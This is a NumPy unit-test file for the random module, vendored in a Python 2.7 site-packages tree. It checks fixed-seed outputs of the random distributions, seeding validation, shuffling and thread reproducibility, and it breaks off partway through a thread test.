"MIT"
] | null | null | null |
bin/Python27/Lib/site-packages/numpy/random/tests/test_random.py
|
lefevre-fraser/openmeta-mms
|
08f3115e76498df1f8d70641d71f5c52cab4ce5f
|
[
"MIT"
] | null | null | null |
bin/Python27/Lib/site-packages/numpy/random/tests/test_random.py
|
lefevre-fraser/openmeta-mms
|
08f3115e76498df1f8d70641d71f5c52cab4ce5f
|
[
"MIT"
] | 1
|
2020-05-07T11:04:14.000Z
|
2020-05-07T11:04:14.000Z
|
from __future__ import division, absolute_import, print_function
import numpy as np
from numpy.testing import (
TestCase, run_module_suite, assert_, assert_raises, assert_equal,
assert_warns)
from numpy import random
from numpy.compat import asbytes
import sys
import warnings
class TestSeed(TestCase):
def test_scalar(self):
s = np.random.RandomState(0)
assert_equal(s.randint(1000), 684)
s = np.random.RandomState(4294967295)
assert_equal(s.randint(1000), 419)
def test_array(self):
s = np.random.RandomState(range(10))
assert_equal(s.randint(1000), 468)
s = np.random.RandomState(np.arange(10))
assert_equal(s.randint(1000), 468)
s = np.random.RandomState([0])
assert_equal(s.randint(1000), 973)
s = np.random.RandomState([4294967295])
assert_equal(s.randint(1000), 265)
def test_invalid_scalar(self):
# seed must be an unsigned 32 bit integer
assert_raises(TypeError, np.random.RandomState, -0.5)
assert_raises(ValueError, np.random.RandomState, -1)
def test_invalid_array(self):
# seed must be an unsigned 32 bit integer
assert_raises(TypeError, np.random.RandomState, [-0.5])
assert_raises(ValueError, np.random.RandomState, [-1])
assert_raises(ValueError, np.random.RandomState, [4294967296])
assert_raises(ValueError, np.random.RandomState, [1, 2, 4294967296])
assert_raises(ValueError, np.random.RandomState, [1, -2, 4294967296])
class TestBinomial(TestCase):
def test_n_zero(self):
# Tests the corner case of n == 0 for the binomial distribution.
# binomial(0, p) should be zero for any p in [0, 1].
# This test addresses issue #3480.
zeros = np.zeros(2, dtype='int')
for p in [0, .5, 1]:
assert_(random.binomial(0, p) == 0)
np.testing.assert_array_equal(random.binomial(zeros, p), zeros)
def test_p_is_nan(self):
# Issue #4571.
assert_raises(ValueError, random.binomial, 1, np.nan)
class TestMultinomial(TestCase):
def test_basic(self):
random.multinomial(100, [0.2, 0.8])
def test_zero_probability(self):
random.multinomial(100, [0.2, 0.8, 0.0, 0.0, 0.0])
def test_int_negative_interval(self):
assert_(-5 <= random.randint(-5, -1) < -1)
x = random.randint(-5, -1, 5)
assert_(np.all(-5 <= x))
assert_(np.all(x < -1))
def test_size(self):
# gh-3173
p = [0.5, 0.5]
assert_equal(np.random.multinomial(1, p, np.uint32(1)).shape, (1, 2))
assert_equal(np.random.multinomial(1, p, np.uint32(1)).shape, (1, 2))
assert_equal(np.random.multinomial(1, p, np.uint32(1)).shape, (1, 2))
assert_equal(np.random.multinomial(1, p, [2, 2]).shape, (2, 2, 2))
assert_equal(np.random.multinomial(1, p, (2, 2)).shape, (2, 2, 2))
assert_equal(np.random.multinomial(1, p, np.array((2, 2))).shape,
(2, 2, 2))
assert_raises(TypeError, np.random.multinomial, 1, p,
np.float(1))
class TestSetState(TestCase):
def setUp(self):
self.seed = 1234567890
self.prng = random.RandomState(self.seed)
self.state = self.prng.get_state()
def test_basic(self):
old = self.prng.tomaxint(16)
self.prng.set_state(self.state)
new = self.prng.tomaxint(16)
assert_(np.all(old == new))
def test_gaussian_reset(self):
# Make sure the cached every-other-Gaussian is reset.
old = self.prng.standard_normal(size=3)
self.prng.set_state(self.state)
new = self.prng.standard_normal(size=3)
assert_(np.all(old == new))
def test_gaussian_reset_in_media_res(self):
# When the state is saved with a cached Gaussian, make sure the
# cached Gaussian is restored.
self.prng.standard_normal()
state = self.prng.get_state()
old = self.prng.standard_normal(size=3)
self.prng.set_state(state)
new = self.prng.standard_normal(size=3)
assert_(np.all(old == new))
def test_backwards_compatibility(self):
# Make sure we can accept old state tuples that do not have the
# cached Gaussian value.
old_state = self.state[:-2]
x1 = self.prng.standard_normal(size=16)
self.prng.set_state(old_state)
x2 = self.prng.standard_normal(size=16)
self.prng.set_state(self.state)
x3 = self.prng.standard_normal(size=16)
assert_(np.all(x1 == x2))
assert_(np.all(x1 == x3))
def test_negative_binomial(self):
# Ensure that the negative binomial results take floating point
# arguments without truncation.
self.prng.negative_binomial(0.5, 0.5)
class TestRandint(TestCase):
rfunc = np.random.randint
# valid integer/boolean types
itype = [np.bool_, np.int8, np.uint8, np.int16, np.uint16,
np.int32, np.uint32, np.int64, np.uint64]
def test_unsupported_type(self):
assert_raises(TypeError, self.rfunc, 1, dtype=np.float)
def test_bounds_checking(self):
for dt in self.itype:
lbnd = 0 if dt is np.bool_ else np.iinfo(dt).min
ubnd = 2 if dt is np.bool_ else np.iinfo(dt).max + 1
assert_raises(ValueError, self.rfunc, lbnd - 1, ubnd, dtype=dt)
assert_raises(ValueError, self.rfunc, lbnd, ubnd + 1, dtype=dt)
assert_raises(ValueError, self.rfunc, ubnd, lbnd, dtype=dt)
assert_raises(ValueError, self.rfunc, 1, 0, dtype=dt)
def test_rng_zero_and_extremes(self):
for dt in self.itype:
lbnd = 0 if dt is np.bool_ else np.iinfo(dt).min
ubnd = 2 if dt is np.bool_ else np.iinfo(dt).max + 1
tgt = ubnd - 1
assert_equal(self.rfunc(tgt, tgt + 1, size=1000, dtype=dt), tgt)
tgt = lbnd
assert_equal(self.rfunc(tgt, tgt + 1, size=1000, dtype=dt), tgt)
tgt = (lbnd + ubnd)//2
assert_equal(self.rfunc(tgt, tgt + 1, size=1000, dtype=dt), tgt)
def test_in_bounds_fuzz(self):
# Don't use fixed seed
np.random.seed()
for dt in self.itype[1:]:
for ubnd in [4, 8, 16]:
vals = self.rfunc(2, ubnd, size=2**16, dtype=dt)
assert_(vals.max() < ubnd)
assert_(vals.min() >= 2)
vals = self.rfunc(0, 2, size=2**16, dtype=np.bool)
assert_(vals.max() < 2)
assert_(vals.min() >= 0)
def test_repeatability(self):
import hashlib
# We use a md5 hash of generated sequences of 1000 samples
# in the range [0, 6) for all but np.bool, where the range
# is [0, 2). Hashes are for little endian numbers.
tgt = {'bool': '7dd3170d7aa461d201a65f8bcf3944b0',
'int16': '1b7741b80964bb190c50d541dca1cac1',
'int32': '4dc9fcc2b395577ebb51793e58ed1a05',
'int64': '17db902806f448331b5a758d7d2ee672',
'int8': '27dd30c4e08a797063dffac2490b0be6',
'uint16': '1b7741b80964bb190c50d541dca1cac1',
'uint32': '4dc9fcc2b395577ebb51793e58ed1a05',
'uint64': '17db902806f448331b5a758d7d2ee672',
'uint8': '27dd30c4e08a797063dffac2490b0be6'}
for dt in self.itype[1:]:
np.random.seed(1234)
# view as little endian for hash
if sys.byteorder == 'little':
val = self.rfunc(0, 6, size=1000, dtype=dt)
else:
val = self.rfunc(0, 6, size=1000, dtype=dt).byteswap()
res = hashlib.md5(val.view(np.int8)).hexdigest()
assert_(tgt[np.dtype(dt).name] == res)
        # bools do not depend on endianness
np.random.seed(1234)
val = self.rfunc(0, 2, size=1000, dtype=np.bool).view(np.int8)
res = hashlib.md5(val).hexdigest()
assert_(tgt[np.dtype(np.bool).name] == res)
def test_respect_dtype_singleton(self):
# See gh-7203
for dt in self.itype:
lbnd = 0 if dt is np.bool_ else np.iinfo(dt).min
ubnd = 2 if dt is np.bool_ else np.iinfo(dt).max + 1
sample = self.rfunc(lbnd, ubnd, dtype=dt)
self.assertEqual(sample.dtype, np.dtype(dt))
for dt in (np.bool, np.int, np.long):
lbnd = 0 if dt is np.bool else np.iinfo(dt).min
ubnd = 2 if dt is np.bool else np.iinfo(dt).max + 1
# gh-7284: Ensure that we get Python data types
sample = self.rfunc(lbnd, ubnd, dtype=dt)
self.assertFalse(hasattr(sample, 'dtype'))
self.assertEqual(type(sample), dt)
class TestRandomDist(TestCase):
# Make sure the random distribution returns the correct value for a
# given seed
def setUp(self):
self.seed = 1234567890
def test_rand(self):
np.random.seed(self.seed)
actual = np.random.rand(3, 2)
desired = np.array([[0.61879477158567997, 0.59162362775974664],
[0.88868358904449662, 0.89165480011560816],
[0.4575674820298663, 0.7781880808593471]])
np.testing.assert_array_almost_equal(actual, desired, decimal=15)
def test_randn(self):
np.random.seed(self.seed)
actual = np.random.randn(3, 2)
desired = np.array([[1.34016345771863121, 1.73759122771936081],
[1.498988344300628, -0.2286433324536169],
[2.031033998682787, 2.17032494605655257]])
np.testing.assert_array_almost_equal(actual, desired, decimal=15)
def test_randint(self):
np.random.seed(self.seed)
actual = np.random.randint(-99, 99, size=(3, 2))
desired = np.array([[31, 3],
[-52, 41],
[-48, -66]])
np.testing.assert_array_equal(actual, desired)
def test_random_integers(self):
np.random.seed(self.seed)
actual = np.random.random_integers(-99, 99, size=(3, 2))
desired = np.array([[31, 3],
[-52, 41],
[-48, -66]])
np.testing.assert_array_equal(actual, desired)
def test_random_integers_max_int(self):
# Tests whether random_integers can generate the
# maximum allowed Python int that can be converted
# into a C long. Previous implementations of this
# method have thrown an OverflowError when attempting
# to generate this integer.
actual = np.random.random_integers(np.iinfo('l').max,
np.iinfo('l').max)
desired = np.iinfo('l').max
np.testing.assert_equal(actual, desired)
def test_random_integers_deprecated(self):
with warnings.catch_warnings():
warnings.simplefilter("error", DeprecationWarning)
# DeprecationWarning raised with high == None
assert_raises(DeprecationWarning,
np.random.random_integers,
np.iinfo('l').max)
# DeprecationWarning raised with high != None
assert_raises(DeprecationWarning,
np.random.random_integers,
np.iinfo('l').max, np.iinfo('l').max)
def test_random_sample(self):
np.random.seed(self.seed)
actual = np.random.random_sample((3, 2))
desired = np.array([[0.61879477158567997, 0.59162362775974664],
[0.88868358904449662, 0.89165480011560816],
[0.4575674820298663, 0.7781880808593471]])
np.testing.assert_array_almost_equal(actual, desired, decimal=15)
def test_choice_uniform_replace(self):
np.random.seed(self.seed)
actual = np.random.choice(4, 4)
desired = np.array([2, 3, 2, 3])
np.testing.assert_array_equal(actual, desired)
def test_choice_nonuniform_replace(self):
np.random.seed(self.seed)
actual = np.random.choice(4, 4, p=[0.4, 0.4, 0.1, 0.1])
desired = np.array([1, 1, 2, 2])
np.testing.assert_array_equal(actual, desired)
def test_choice_uniform_noreplace(self):
np.random.seed(self.seed)
actual = np.random.choice(4, 3, replace=False)
desired = np.array([0, 1, 3])
np.testing.assert_array_equal(actual, desired)
def test_choice_nonuniform_noreplace(self):
np.random.seed(self.seed)
actual = np.random.choice(4, 3, replace=False,
p=[0.1, 0.3, 0.5, 0.1])
desired = np.array([2, 3, 1])
np.testing.assert_array_equal(actual, desired)
def test_choice_noninteger(self):
np.random.seed(self.seed)
actual = np.random.choice(['a', 'b', 'c', 'd'], 4)
desired = np.array(['c', 'd', 'c', 'd'])
np.testing.assert_array_equal(actual, desired)
def test_choice_exceptions(self):
sample = np.random.choice
assert_raises(ValueError, sample, -1, 3)
assert_raises(ValueError, sample, 3., 3)
assert_raises(ValueError, sample, [[1, 2], [3, 4]], 3)
assert_raises(ValueError, sample, [], 3)
assert_raises(ValueError, sample, [1, 2, 3, 4], 3,
p=[[0.25, 0.25], [0.25, 0.25]])
assert_raises(ValueError, sample, [1, 2], 3, p=[0.4, 0.4, 0.2])
assert_raises(ValueError, sample, [1, 2], 3, p=[1.1, -0.1])
assert_raises(ValueError, sample, [1, 2], 3, p=[0.4, 0.4])
assert_raises(ValueError, sample, [1, 2, 3], 4, replace=False)
assert_raises(ValueError, sample, [1, 2, 3], 2, replace=False,
p=[1, 0, 0])
def test_choice_return_shape(self):
p = [0.1, 0.9]
# Check scalar
assert_(np.isscalar(np.random.choice(2, replace=True)))
assert_(np.isscalar(np.random.choice(2, replace=False)))
assert_(np.isscalar(np.random.choice(2, replace=True, p=p)))
assert_(np.isscalar(np.random.choice(2, replace=False, p=p)))
assert_(np.isscalar(np.random.choice([1, 2], replace=True)))
assert_(np.random.choice([None], replace=True) is None)
a = np.array([1, 2])
arr = np.empty(1, dtype=object)
arr[0] = a
assert_(np.random.choice(arr, replace=True) is a)
# Check 0-d array
s = tuple()
assert_(not np.isscalar(np.random.choice(2, s, replace=True)))
assert_(not np.isscalar(np.random.choice(2, s, replace=False)))
assert_(not np.isscalar(np.random.choice(2, s, replace=True, p=p)))
assert_(not np.isscalar(np.random.choice(2, s, replace=False, p=p)))
assert_(not np.isscalar(np.random.choice([1, 2], s, replace=True)))
assert_(np.random.choice([None], s, replace=True).ndim == 0)
a = np.array([1, 2])
arr = np.empty(1, dtype=object)
arr[0] = a
assert_(np.random.choice(arr, s, replace=True).item() is a)
# Check multi dimensional array
s = (2, 3)
p = [0.1, 0.1, 0.1, 0.1, 0.4, 0.2]
assert_(np.random.choice(6, s, replace=True).shape, s)
assert_(np.random.choice(6, s, replace=False).shape, s)
assert_(np.random.choice(6, s, replace=True, p=p).shape, s)
assert_(np.random.choice(6, s, replace=False, p=p).shape, s)
assert_(np.random.choice(np.arange(6), s, replace=True).shape, s)
def test_bytes(self):
np.random.seed(self.seed)
actual = np.random.bytes(10)
desired = asbytes('\x82Ui\x9e\xff\x97+Wf\xa5')
np.testing.assert_equal(actual, desired)
def test_shuffle(self):
# Test lists, arrays (of various dtypes), and multidimensional versions
# of both, c-contiguous or not:
for conv in [lambda x: np.array([]),
lambda x: x,
lambda x: np.asarray(x).astype(np.int8),
lambda x: np.asarray(x).astype(np.float32),
lambda x: np.asarray(x).astype(np.complex64),
lambda x: np.asarray(x).astype(object),
lambda x: [(i, i) for i in x],
lambda x: np.asarray([[i, i] for i in x]),
lambda x: np.vstack([x, x]).T,
# gh-4270
lambda x: np.asarray([(i, i) for i in x],
[("a", object, 1),
("b", np.int32, 1)])]:
np.random.seed(self.seed)
alist = conv([1, 2, 3, 4, 5, 6, 7, 8, 9, 0])
np.random.shuffle(alist)
actual = alist
desired = conv([0, 1, 9, 6, 2, 4, 5, 8, 7, 3])
np.testing.assert_array_equal(actual, desired)
def test_shuffle_masked(self):
# gh-3263
a = np.ma.masked_values(np.reshape(range(20), (5,4)) % 3 - 1, -1)
b = np.ma.masked_values(np.arange(20) % 3 - 1, -1)
a_orig = a.copy()
b_orig = b.copy()
for i in range(50):
np.random.shuffle(a)
assert_equal(
sorted(a.data[~a.mask]), sorted(a_orig.data[~a_orig.mask]))
np.random.shuffle(b)
assert_equal(
sorted(b.data[~b.mask]), sorted(b_orig.data[~b_orig.mask]))
def test_beta(self):
np.random.seed(self.seed)
actual = np.random.beta(.1, .9, size=(3, 2))
desired = np.array(
[[1.45341850513746058e-02, 5.31297615662868145e-04],
[1.85366619058432324e-06, 4.19214516800110563e-03],
[1.58405155108498093e-04, 1.26252891949397652e-04]])
np.testing.assert_array_almost_equal(actual, desired, decimal=15)
def test_binomial(self):
np.random.seed(self.seed)
actual = np.random.binomial(100.123, .456, size=(3, 2))
desired = np.array([[37, 43],
[42, 48],
[46, 45]])
np.testing.assert_array_equal(actual, desired)
def test_chisquare(self):
np.random.seed(self.seed)
actual = np.random.chisquare(50, size=(3, 2))
desired = np.array([[63.87858175501090585, 68.68407748911370447],
[65.77116116901505904, 47.09686762438974483],
[72.3828403199695174, 74.18408615260374006]])
np.testing.assert_array_almost_equal(actual, desired, decimal=13)
def test_dirichlet(self):
np.random.seed(self.seed)
alpha = np.array([51.72840233779265162, 39.74494232180943953])
actual = np.random.mtrand.dirichlet(alpha, size=(3, 2))
desired = np.array([[[0.54539444573611562, 0.45460555426388438],
[0.62345816822039413, 0.37654183177960598]],
[[0.55206000085785778, 0.44793999914214233],
[0.58964023305154301, 0.41035976694845688]],
[[0.59266909280647828, 0.40733090719352177],
[0.56974431743975207, 0.43025568256024799]]])
np.testing.assert_array_almost_equal(actual, desired, decimal=15)
def test_dirichlet_size(self):
# gh-3173
p = np.array([51.72840233779265162, 39.74494232180943953])
assert_equal(np.random.dirichlet(p, np.uint32(1)).shape, (1, 2))
assert_equal(np.random.dirichlet(p, np.uint32(1)).shape, (1, 2))
assert_equal(np.random.dirichlet(p, np.uint32(1)).shape, (1, 2))
assert_equal(np.random.dirichlet(p, [2, 2]).shape, (2, 2, 2))
assert_equal(np.random.dirichlet(p, (2, 2)).shape, (2, 2, 2))
assert_equal(np.random.dirichlet(p, np.array((2, 2))).shape, (2, 2, 2))
assert_raises(TypeError, np.random.dirichlet, p, np.float(1))
def test_exponential(self):
np.random.seed(self.seed)
actual = np.random.exponential(1.1234, size=(3, 2))
desired = np.array([[1.08342649775011624, 1.00607889924557314],
[2.46628830085216721, 2.49668106809923884],
[0.68717433461363442, 1.69175666993575979]])
np.testing.assert_array_almost_equal(actual, desired, decimal=15)
def test_f(self):
np.random.seed(self.seed)
actual = np.random.f(12, 77, size=(3, 2))
desired = np.array([[1.21975394418575878, 1.75135759791559775],
[1.44803115017146489, 1.22108959480396262],
[1.02176975757740629, 1.34431827623300415]])
np.testing.assert_array_almost_equal(actual, desired, decimal=15)
def test_gamma(self):
np.random.seed(self.seed)
actual = np.random.gamma(5, 3, size=(3, 2))
desired = np.array([[24.60509188649287182, 28.54993563207210627],
[26.13476110204064184, 12.56988482927716078],
[31.71863275789960568, 33.30143302795922011]])
np.testing.assert_array_almost_equal(actual, desired, decimal=14)
def test_geometric(self):
np.random.seed(self.seed)
actual = np.random.geometric(.123456789, size=(3, 2))
desired = np.array([[8, 7],
[17, 17],
[5, 12]])
np.testing.assert_array_equal(actual, desired)
def test_gumbel(self):
np.random.seed(self.seed)
actual = np.random.gumbel(loc=.123456789, scale=2.0, size=(3, 2))
desired = np.array([[0.19591898743416816, 0.34405539668096674],
[-1.4492522252274278, -1.47374816298446865],
[1.10651090478803416, -0.69535848626236174]])
np.testing.assert_array_almost_equal(actual, desired, decimal=15)
def test_hypergeometric(self):
np.random.seed(self.seed)
actual = np.random.hypergeometric(10.1, 5.5, 14, size=(3, 2))
desired = np.array([[10, 10],
[10, 10],
[9, 9]])
np.testing.assert_array_equal(actual, desired)
# Test nbad = 0
actual = np.random.hypergeometric(5, 0, 3, size=4)
desired = np.array([3, 3, 3, 3])
np.testing.assert_array_equal(actual, desired)
actual = np.random.hypergeometric(15, 0, 12, size=4)
desired = np.array([12, 12, 12, 12])
np.testing.assert_array_equal(actual, desired)
# Test ngood = 0
actual = np.random.hypergeometric(0, 5, 3, size=4)
desired = np.array([0, 0, 0, 0])
np.testing.assert_array_equal(actual, desired)
actual = np.random.hypergeometric(0, 15, 12, size=4)
desired = np.array([0, 0, 0, 0])
np.testing.assert_array_equal(actual, desired)
def test_laplace(self):
np.random.seed(self.seed)
actual = np.random.laplace(loc=.123456789, scale=2.0, size=(3, 2))
desired = np.array([[0.66599721112760157, 0.52829452552221945],
[3.12791959514407125, 3.18202813572992005],
[-0.05391065675859356, 1.74901336242837324]])
np.testing.assert_array_almost_equal(actual, desired, decimal=15)
def test_logistic(self):
np.random.seed(self.seed)
actual = np.random.logistic(loc=.123456789, scale=2.0, size=(3, 2))
desired = np.array([[1.09232835305011444, 0.8648196662399954],
[4.27818590694950185, 4.33897006346929714],
[-0.21682183359214885, 2.63373365386060332]])
np.testing.assert_array_almost_equal(actual, desired, decimal=15)
def test_lognormal(self):
np.random.seed(self.seed)
actual = np.random.lognormal(mean=.123456789, sigma=2.0, size=(3, 2))
desired = np.array([[16.50698631688883822, 36.54846706092654784],
[22.67886599981281748, 0.71617561058995771],
[65.72798501792723869, 86.84341601437161273]])
np.testing.assert_array_almost_equal(actual, desired, decimal=13)
def test_logseries(self):
np.random.seed(self.seed)
actual = np.random.logseries(p=.923456789, size=(3, 2))
desired = np.array([[2, 2],
[6, 17],
[3, 6]])
np.testing.assert_array_equal(actual, desired)
def test_multinomial(self):
np.random.seed(self.seed)
actual = np.random.multinomial(20, [1/6.]*6, size=(3, 2))
desired = np.array([[[4, 3, 5, 4, 2, 2],
[5, 2, 8, 2, 2, 1]],
[[3, 4, 3, 6, 0, 4],
[2, 1, 4, 3, 6, 4]],
[[4, 4, 2, 5, 2, 3],
[4, 3, 4, 2, 3, 4]]])
np.testing.assert_array_equal(actual, desired)
def test_multivariate_normal(self):
np.random.seed(self.seed)
mean = (.123456789, 10)
# Hmm... not even symmetric.
cov = [[1, 0], [1, 0]]
size = (3, 2)
actual = np.random.multivariate_normal(mean, cov, size)
desired = np.array([[[-1.47027513018564449, 10.],
[-1.65915081534845532, 10.]],
[[-2.29186329304599745, 10.],
[-1.77505606019580053, 10.]],
[[-0.54970369430044119, 10.],
[0.29768848031692957, 10.]]])
np.testing.assert_array_almost_equal(actual, desired, decimal=15)
# Check for default size, was raising deprecation warning
actual = np.random.multivariate_normal(mean, cov)
desired = np.array([-0.79441224511977482, 10.])
np.testing.assert_array_almost_equal(actual, desired, decimal=15)
# Check that non positive-semidefinite covariance raises warning
mean = [0, 0]
cov = [[1, 1 + 1e-10], [1 + 1e-10, 1]]
assert_warns(RuntimeWarning, np.random.multivariate_normal, mean, cov)
def test_negative_binomial(self):
np.random.seed(self.seed)
actual = np.random.negative_binomial(n=100, p=.12345, size=(3, 2))
desired = np.array([[848, 841],
[892, 611],
[779, 647]])
np.testing.assert_array_equal(actual, desired)
def test_noncentral_chisquare(self):
np.random.seed(self.seed)
actual = np.random.noncentral_chisquare(df=5, nonc=5, size=(3, 2))
desired = np.array([[23.91905354498517511, 13.35324692733826346],
[31.22452661329736401, 16.60047399466177254],
[5.03461598262724586, 17.94973089023519464]])
np.testing.assert_array_almost_equal(actual, desired, decimal=14)
actual = np.random.noncentral_chisquare(df=.5, nonc=.2, size=(3, 2))
desired = np.array([[ 1.47145377828516666, 0.15052899268012659],
[ 0.00943803056963588, 1.02647251615666169],
[ 0.332334982684171 , 0.15451287602753125]])
np.testing.assert_array_almost_equal(actual, desired, decimal=14)
np.random.seed(self.seed)
actual = np.random.noncentral_chisquare(df=5, nonc=0, size=(3, 2))
desired = np.array([[9.597154162763948, 11.725484450296079],
[10.413711048138335, 3.694475922923986],
[13.484222138963087, 14.377255424602957]])
np.testing.assert_array_almost_equal(actual, desired, decimal=14)
def test_noncentral_f(self):
np.random.seed(self.seed)
actual = np.random.noncentral_f(dfnum=5, dfden=2, nonc=1,
size=(3, 2))
desired = np.array([[1.40598099674926669, 0.34207973179285761],
[3.57715069265772545, 7.92632662577829805],
[0.43741599463544162, 1.1774208752428319]])
np.testing.assert_array_almost_equal(actual, desired, decimal=14)
def test_normal(self):
np.random.seed(self.seed)
actual = np.random.normal(loc=.123456789, scale=2.0, size=(3, 2))
desired = np.array([[2.80378370443726244, 3.59863924443872163],
[3.121433477601256, -0.33382987590723379],
[4.18552478636557357, 4.46410668111310471]])
np.testing.assert_array_almost_equal(actual, desired, decimal=15)
def test_pareto(self):
np.random.seed(self.seed)
actual = np.random.pareto(a=.123456789, size=(3, 2))
desired = np.array(
[[2.46852460439034849e+03, 1.41286880810518346e+03],
[5.28287797029485181e+07, 6.57720981047328785e+07],
[1.40840323350391515e+02, 1.98390255135251704e+05]])
# For some reason on 32-bit x86 Ubuntu 12.10 the [1, 0] entry in this
# matrix differs by 24 nulps. Discussion:
# http://mail.scipy.org/pipermail/numpy-discussion/2012-September/063801.html
# Consensus is that this is probably some gcc quirk that affects
# rounding but not in any important way, so we just use a looser
# tolerance on this test:
np.testing.assert_array_almost_equal_nulp(actual, desired, nulp=30)
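# "nulp" = number of units in the last place.  assert_array_almost_equal_nulp
# compares floats by their spacing-relative distance, so nulp=30 tolerates
# roughly 30 representable doubles of drift on these very large Pareto values.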
def test_poisson(self):
np.random.seed(self.seed)
actual = np.random.poisson(lam=.123456789, size=(3, 2))
desired = np.array([[0, 0],
[1, 0],
[0, 0]])
np.testing.assert_array_equal(actual, desired)
def test_poisson_exceptions(self):
lambig = np.iinfo('l').max
lamneg = -1
assert_raises(ValueError, np.random.poisson, lamneg)
assert_raises(ValueError, np.random.poisson, [lamneg]*10)
assert_raises(ValueError, np.random.poisson, lambig)
assert_raises(ValueError, np.random.poisson, [lambig]*10)
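# lam must be non-negative and is also capped just below np.iinfo('l').max
# (presumably so the sampled counts cannot overflow a C long), hence both the
# negative and the huge lambda are rejected with ValueError, for scalar and
# array arguments alike.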
def test_power(self):
np.random.seed(self.seed)
actual = np.random.power(a=.123456789, size=(3, 2))
desired = np.array([[0.02048932883240791, 0.01424192241128213],
[0.38446073748535298, 0.39499689943484395],
[0.00177699707563439, 0.13115505880863756]])
np.testing.assert_array_almost_equal(actual, desired, decimal=15)
def test_rayleigh(self):
np.random.seed(self.seed)
actual = np.random.rayleigh(scale=10, size=(3, 2))
desired = np.array([[13.8882496494248393, 13.383318339044731],
[20.95413364294492098, 21.08285015800712614],
[11.06066537006854311, 17.35468505778271009]])
np.testing.assert_array_almost_equal(actual, desired, decimal=14)
def test_standard_cauchy(self):
np.random.seed(self.seed)
actual = np.random.standard_cauchy(size=(3, 2))
desired = np.array([[0.77127660196445336, -6.55601161955910605],
[0.93582023391158309, -2.07479293013759447],
[-4.74601644297011926, 0.18338989290760804]])
np.testing.assert_array_almost_equal(actual, desired, decimal=15)
def test_standard_exponential(self):
np.random.seed(self.seed)
actual = np.random.standard_exponential(size=(3, 2))
desired = np.array([[0.96441739162374596, 0.89556604882105506],
[2.1953785836319808, 2.22243285392490542],
[0.6116915921431676, 1.50592546727413201]])
np.testing.assert_array_almost_equal(actual, desired, decimal=15)
def test_standard_gamma(self):
np.random.seed(self.seed)
actual = np.random.standard_gamma(shape=3, size=(3, 2))
desired = np.array([[5.50841531318455058, 6.62953470301903103],
[5.93988484943779227, 2.31044849402133989],
[7.54838614231317084, 8.012756093271868]])
np.testing.assert_array_almost_equal(actual, desired, decimal=14)
def test_standard_normal(self):
np.random.seed(self.seed)
actual = np.random.standard_normal(size=(3, 2))
desired = np.array([[1.34016345771863121, 1.73759122771936081],
[1.498988344300628, -0.2286433324536169],
[2.031033998682787, 2.17032494605655257]])
np.testing.assert_array_almost_equal(actual, desired, decimal=15)
def test_standard_t(self):
np.random.seed(self.seed)
actual = np.random.standard_t(df=10, size=(3, 2))
desired = np.array([[0.97140611862659965, -0.08830486548450577],
[1.36311143689505321, -0.55317463909867071],
[-0.18473749069684214, 0.61181537341755321]])
np.testing.assert_array_almost_equal(actual, desired, decimal=15)
def test_triangular(self):
np.random.seed(self.seed)
actual = np.random.triangular(left=5.12, mode=10.23, right=20.34,
size=(3, 2))
desired = np.array([[12.68117178949215784, 12.4129206149193152],
[16.20131377335158263, 16.25692138747600524],
[11.20400690911820263, 14.4978144835829923]])
np.testing.assert_array_almost_equal(actual, desired, decimal=14)
def test_uniform(self):
np.random.seed(self.seed)
actual = np.random.uniform(low=1.23, high=10.54, size=(3, 2))
desired = np.array([[6.99097932346268003, 6.73801597444323974],
[9.50364421400426274, 9.53130618907631089],
[5.48995325769805476, 8.47493103280052118]])
np.testing.assert_array_almost_equal(actual, desired, decimal=15)
def test_uniform_range_bounds(self):
fmin = np.finfo('float').min
fmax = np.finfo('float').max
func = np.random.uniform
np.testing.assert_raises(OverflowError, func, -np.inf, 0)
np.testing.assert_raises(OverflowError, func, 0, np.inf)
np.testing.assert_raises(OverflowError, func, fmin, fmax)
# (fmax / 1e17) - fmin is within range, so this should not throw
np.random.uniform(low=fmin, high=fmax / 1e17)
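# The overflow checks imply that uniform() works with the range width
# high - low internally: any pair of bounds whose difference overflows a double
# raises OverflowError, while shrinking the upper bound to fmax / 1e17 keeps
# the width finite and therefore valid.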
def test_vonmises(self):
np.random.seed(self.seed)
actual = np.random.vonmises(mu=1.23, kappa=1.54, size=(3, 2))
desired = np.array([[2.28567572673902042, 2.89163838442285037],
[0.38198375564286025, 2.57638023113890746],
[1.19153771588353052, 1.83509849681825354]])
np.testing.assert_array_almost_equal(actual, desired, decimal=15)
def test_vonmises_small(self):
# check infinite loop, gh-4720
np.random.seed(self.seed)
r = np.random.vonmises(mu=0., kappa=1.1e-8, size=10**6)
np.testing.assert_(np.isfinite(r).all())
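# Regression check for gh-4720: sampling the von Mises distribution with a very
# small kappa previously could loop forever, so the test only asserts that the
# draw terminates and returns finite values.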
def test_wald(self):
np.random.seed(self.seed)
actual = np.random.wald(mean=1.23, scale=1.54, size=(3, 2))
desired = np.array([[3.82935265715889983, 5.13125249184285526],
[0.35045403618358717, 1.50832396872003538],
[0.24124319895843183, 0.22031101461955038]])
np.testing.assert_array_almost_equal(actual, desired, decimal=14)
def test_weibull(self):
np.random.seed(self.seed)
actual = np.random.weibull(a=1.23, size=(3, 2))
desired = np.array([[0.97097342648766727, 0.91422896443565516],
[1.89517770034962929, 1.91414357960479564],
[0.67057783752390987, 1.39494046635066793]])
np.testing.assert_array_almost_equal(actual, desired, decimal=15)
def test_zipf(self):
np.random.seed(self.seed)
actual = np.random.zipf(a=1.23, size=(3, 2))
desired = np.array([[66, 29],
[1, 1],
[3, 13]])
np.testing.assert_array_equal(actual, desired)


class TestThread(object):
# make sure each state produces the same sequence even in threads
def setUp(self):
self.seeds = range(4)
def check_function(self, function, sz):
from threading import Thread
out1 = np.empty((len(self.seeds),) + sz)
out2 = np.empty((len(self.seeds),) + sz)
# threaded generation
t = [Thread(target=function, args=(np.random.RandomState(s), o))
for s, o in zip(self.seeds, out1)]
[x.start() for x in t]
[x.join() for x in t]
# the same serial
for s, o in zip(self.seeds, out2):
function(np.random.RandomState(s), o)
# these platforms change x87 fpu precision mode in threads
if (np.intp().dtype.itemsize == 4 and sys.platform == "win32"):
np.testing.assert_array_almost_equal(out1, out2)
else:
np.testing.assert_array_equal(out1, out2)
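# check_function contract: each thread fills one row of out1 from its own
# RandomState(seed), and the serial loop fills out2 the same way.  The two must
# match exactly, except on 32-bit Windows where threads can switch the x87 FPU
# precision mode, so only an almost-equal comparison is safe there.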
def test_normal(self):
def gen_random(state, out):
out[...] = state.normal(size=10000)
self.check_function(gen_random, sz=(10000,))
def test_exp(self):
def gen_random(state, out):
out[...] = state.exponential(scale=np.ones((100, 1000)))
